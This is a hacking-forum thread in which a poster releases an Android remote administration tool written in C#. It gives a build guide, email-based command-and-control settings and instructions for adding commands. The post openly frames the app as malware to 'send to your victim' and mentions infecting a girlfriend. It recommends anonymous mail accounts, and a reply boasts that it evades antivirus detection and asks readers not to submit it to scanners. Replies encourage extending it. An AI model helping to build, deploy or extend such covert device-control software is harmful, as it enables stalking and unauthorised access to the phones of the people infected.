Android Remote Administration Tool: Argus - RAT [C#]

csharp
rat
android

(The C# Dude) #1

Hey mates!
After roughly 30 hours of work, I’m now finished with my own Android Remote Administration Tool :slight_smile:. It was my holiday project, which I planned several weeks before. Argus - RAT is of course named after the giant in the Greek mythology. But… I think that’s not interesting for you :wink:. Let’s dive directly into it!


Introduction

This is an Android application, which runs a background service on boot to receive commands. Sounds simple, is simple.

Features

  • Background service, which is able to receive commands
  • Service is running on boot
  • C&C via E-Mail (And here we got the first point, which should get discussed… See below :wink:)
  • Communication is encrypted with XOR (Yeeha, directly got the second discussion point :smile:)
  • A solid error-handling, that our Client doesn’t crash due to connection errors or invalid input :wink:
  • Remote Administration via Windows application (Should run under Linux with Mono too… Maybe someone here want to test it?)

Commands

At the moment I only included two POC commands to show how commands in generell can be added. Of course these ones are pretty boring, but you can easily extend the RAT with your one ones! And I’ll add more useful commands in the next days/weeks.

  • Show a Toast
  • Open a webpage

Why do you use E-Mail for C&C?

Mmh… I didn’t want to use Reverse TCP and have recently read about E-Mail C&C, which I wanted to try out. At the moment I’ve got no problems with this decision, but you should add FTP support, when you want to send files or big data back to your Server.

XOR-encryption? Are you fuckin’ serious, man?

Of course that’s not meant for real protection :smile:. I just wanted to have something to hide my communication from “normal” people. I’ll add AES + Some sort of origin-validation, which takes us to the next point:

WARNING

At the moment anyone can hijack the connection and send commands to our Client, who knows the Server’s Mail address (Password’s not needed; keyword is spoofing), the Client’s Mail address and the XOR key! I don’t think you want anyone to send weird messages to your Girlfriend, after you infected her with the RAT, so I’ll fix this soon :wink:.


Setup

Here comes the newbie friendly guide on how to build an APK out of the source code, setup the required Mail addresses and use the Control Server for sending commands! I use Win10 64-Bit with Visual Studio 2015. Other OSs and IDEs could work, but are not supported! Ok, now after I’ve created a bad mood for the Linux and Mac users here, we can go further on :smile:. (Little side note: I would have used Linux, but sadly Xamarin is only available for Windows and MacOS… And programming in Java is out of discussion)

Client

First you have to install Visual Studio with Xamarin. Don’t know how? See here. Now download the project from my Github page. Run Visual Studio and open the project:


Select now the Project file:

Now you only have to open the Globals file from the project Argus - RAT. Not Argus - RAT ~ Server!

You should see the Globals.cs file now in the middle of your screen.

Here’s the only place you have to edit. If you don’t know what you’re doing, don’t touch other files! It’s not needed.

Ok, as you see you’ll need two Mail addresses, which you have to create on your own. As an example I use https://web.de, because they don’t check anything, so you can easily create the addresses anonymously, but I don’t know wether you understand the page, without a knowledge of german :smile:. Of course you can use Gmail too, but they always ask me for validation via phone call…

Anyway, the important part is that you may have to allow POP & IMAP access to your account in the Mail settings of your provider! https://web.de needs it and I think others need it too! Just google around, if you don’t know :wink:.

If you use another provider and not https://web.de, you’ll have to change the Mail Server settings in Globals.cs too! And another time, just google around for POP & SMTP address + ports and I’m sure you’ll find it :slight_smile:.

Ok, after you’re done fill in your details in Globals.cs:

//-\\-//-\\-//-\\-//-\\-//- MAIL STUFF -\\-//-\\-//-\\-//-\\-//-\\

        // MAIL SERVER       Only needs to be changed, when you use another provider
        public String MailServerPopAddress  = "pop3.web.de";
        public String MailServerSmtpAddress = "smtp.web.de";
        public int MailServerSmtpPort       = 587;
        public int MailServerPort           = 995;

        // CLIENT
        public String ClientMailAddress     = "[email protected]";   // The address of the client
        public String ClientMailPass        = "p455w0rd";    // The password of your Client's mail address

        // SERVER
        public String ServerMailAddress     = "[email protected]";    // The address of your Server

        // ENCRYPTION
        public String XorKey                = "testKeyOfDoom";   // The key you use for encrypion. Please use something hard, because you won't have to fill it in any forms multiple times. You'll just have to fill it in, when you add the Client to your Server (See later) and then you can just forget it!

After you changed the relevant values check them twice! You won’t get a second chance. When the .APK is sent to your victim and it doesn’t work, it’ll get interesting to tell him/her that he/she has to install your “new” version of the program, just because you filled in the wrong credentials…

Sure that you’re ready? Then we come to the building process… First, change the mode to “Release”:

Then select Tools -> Android -> Publish Android App. Now you should get a screen like this one, if you do it the first time:

Just fill in whatever you like to create new keys for signing and continue. On the next screen choose the path to save it to and the name. Ready? Click Publish! Now it takes some time…

When it’s finished, you got a fully working Android Remote Administration Tool! Just send the .APK to your victim and when he/she installs and opens it you’re in!

Server

The setup of our Server is much easier. Either open the Argus - RAT ~ Server project in Visual Studio and run it by pressing F5 or search the Argus - RAT ~ Server directory manually and run the executable in the Release directory. That’s up to you :wink:. Anyway, you’ll get this:

Yes, not that great stuff… As I said above, I’ve only added two POC commands, but I’ll explain later how you can add your very own functions!

For now just click Add Client.

Explanation
Name: The name you want to call your Client. It’s just a description and does not depend on anything, so you can choose whatever you want :smile:.

Client’s Mail address: The address you chose for your Client.

Server’s Mail address: The address you’ll use for the Server.

Server’s Mail password: :expressionless: Don’t know what should be here? Please just go to http://hackforums.net or any other kids place…

Encryption Key: The key you used in the Globals.cs file! Upper and lower case is respected!

And that was it. Now you can select the Client via ComboBox and send him commands:


Developer?

You are a developer and want to extend the RAT’s features? Then you’re exactly the kind of person I appreciate here :grin:. Ok, to make it easier for you I’ll explain every step you have to make, when you want to add your function!

I hope you’ve already opened the project in Visual Studio. If not, do so. The important files are:
Argus - RAT

  • MainService.cs
  • Commands.cs

Argus - RAT ~ Server

  • Commands.cs

And you should add your own entry in the Form. That’s up to you, how you want to do it, so I don’t explain this step.

Every file is open? Great, let’s go on.

Think about it…

What do you want as a new function? What arguments are needed? Which name do you want to give the command? These questions have to be answered before you continue.

As an example I’ll use the Toast command I already added.
Name: Toast
Argument(s): Text

Server (Commands.cs)

In the Commands.cs file you only have to add a function like this one:

        /// <summary>
        /// Sends a Toast to Client
        /// </summary>
        /// <param name="text">The Toast to show</param>
        public bool SendToast(String text)
        {
            String body = "Toast:" + text;
            return SendMail(body);
        }

Please put it below the /* Commands*/ comment, so that everything’s in the right order :wink:.

Explanation
The only thing I have to explain is the String body = "Toast:" + text;. The "Toast:" is used to identify the command when it arrives at your client. Just change Toast with the name you’ve chosen fo your function and the arguments behind with the ones you need. If you got any questions feel free to ask me :slight_smile:.

Client

In the MainService.cs you just have to add an else if to the handleCommand() function. Example:

else if (cmd == "toast")
                Commands.ShowWebsite(value);

Make sure to use lowercase even when you used uppercase at Server-side. The command will be made lowercase, when it arrives at the client!

value is everything behind the colon.

And now the setup is finished and you can start writing your own function! Open Commands.cs and add your Code. For example:

        /// <summary>
        /// Shows the given text as toast
        /// </summary>
        /// <param name="text">Text to toast out</param>
        public static void ShowToast(String text)
        {
            Application.SynchronizationContext.Post(_ => { Toast.MakeText(Android.App.Application.Context, text, ToastLength.Long).Show(); }, null);
        }

Now you’ve made your own function within about 5 minutes!

Conclusion

Wow, it got longer than I thought :smile:. I hope you’re enjoying this and are interested in extending the features :slight_smile:. I’ll add different improvements in the next days, so make sure to check it out :wink:. For everyone who wants to test out his own features or just want to try the RAT without using any samrtphone, I can recommend Bluestacks! It is annoying as CAPTCHAs, but very helpfull, if you just want to easily test your apps in a nearly real environment.

|-TheDoctor-|


(pico) #2

Nice post mate. You are getting there.

Love the name… the 100-eyed giant!


#3

Honestly I’m amazed. Great job mate! Thanks for sharing it too. :wink:


(Command-Line Ninja) #4

MIND-BLOWN This is, really cool. So cool infact, I may have to go change. The best shells and rats are the least known ones - Because you don’t have to AV to worry about.


(The C# Dude) #5

Yep, this one won’t get detected, but please don’t upload to Virustotal or any other Scanner!!!

I’ll work on the RAT, add more commands (useful ones :wink:) and then it may really can be used :smile:. At the moment it’s a skeletal structure for anyone, who needs an Android RAT, but doesn’t want to build one outta nowhere :slight_smile:. As explained in the post, adding features is as simple as writing about 7 lines to “register” the new function and then you can already start straight with your code! You don’t have to worry about communication or any other stuff.

Finally I want to add, that every help is highly appreciated! If you know a way to improve one vital function, that it doesn’t crash that easy or just improve the speed, etc… just send me a Pull request and it gets added!

For example the points I already wrote in my post:

  • Better encryption (Maybe AES + HMAC? Knowledge level required: beginner)
  • The webpage command doesn’t work, when the service is started on boot and not from within the app. Maybe someone wanna have a look at it? Knowledge level required: intermediate? Or I’m just too dump to fix it on my own :grin:
  • Testing, testing and again: testing. I don’t know if some of you have the time, but this point would be very valuable, when it comes to real world use later on :wink:.
  • And of course: commands! You want a command to be added? There’re two ways: Load the RAT into Visual Studio and get your hands dirty or just leave a comment!

If you have any commands, which you think could be useful, just write a comment with a description and I’ll be glad to try adding it :slight_smile:. Maybe even other programmers here get interested in trying it out and join the developer team :smile:.


#6

Perhaps 0x00sec’s own Android RAT? I’m keen to contribute but I’ve only used C# for a few weeks so I’ll just lurk for now.


(The C# Dude) #7

Yes, 0x00sec’s own Android RAT :slight_smile:. I hope my explanation of adding functions is not too confusing; it would be great if the malware guy @dtm would join :smile:. C# is a pretty easy language, so I think you won’t have problems with it :wink:.


(Not a N00b, but still learning) #8

So it would be to risky to get detected if you upload it to GitHub? Just an idea, but what about hosting a GitLab on 0x00sec for this sort of projects? @pry0cc


(oaktree) #9

While you may refer to this program as “0x00sec’s RAT,” 0x00sec is not liable for damages caused by malicious use of this program or any of its components.


#10

Making a collaborative Git for 0x00sec’s devs sounds incredibly fun. I wonder what tools the community can create together…


(Command-Line Ninja) #11

Insanely cool idea! Perhaps S^3 can look at hosting it, they have a spare server lying around :wink: @Sstrykerr @Suser


(The C# Dude) #12

As @oaktree said: That’s not the 0x00sec RAT. 0x00sec is not responsible for it. If you have questions or errors talk to me and don’t blame the whole board!


0x00Sec Tools : Collaboration
#13

@TheDoctor

This looks really cool! Have to try it soon :slight_smile:
And I like the idea with web.de, have some accounts on there too :wink:


(nuller) #14

@TheDoctor Nice post.For encryption you could use RSA with preexchanged public keys, if download is done through a secure channel or you installing it manually :stuck_out_tongue:


(Command-Line Ninja) #15

This topic was automatically closed after 2 days. New replies are no longer allowed.


(system) #16

(oaktree) #17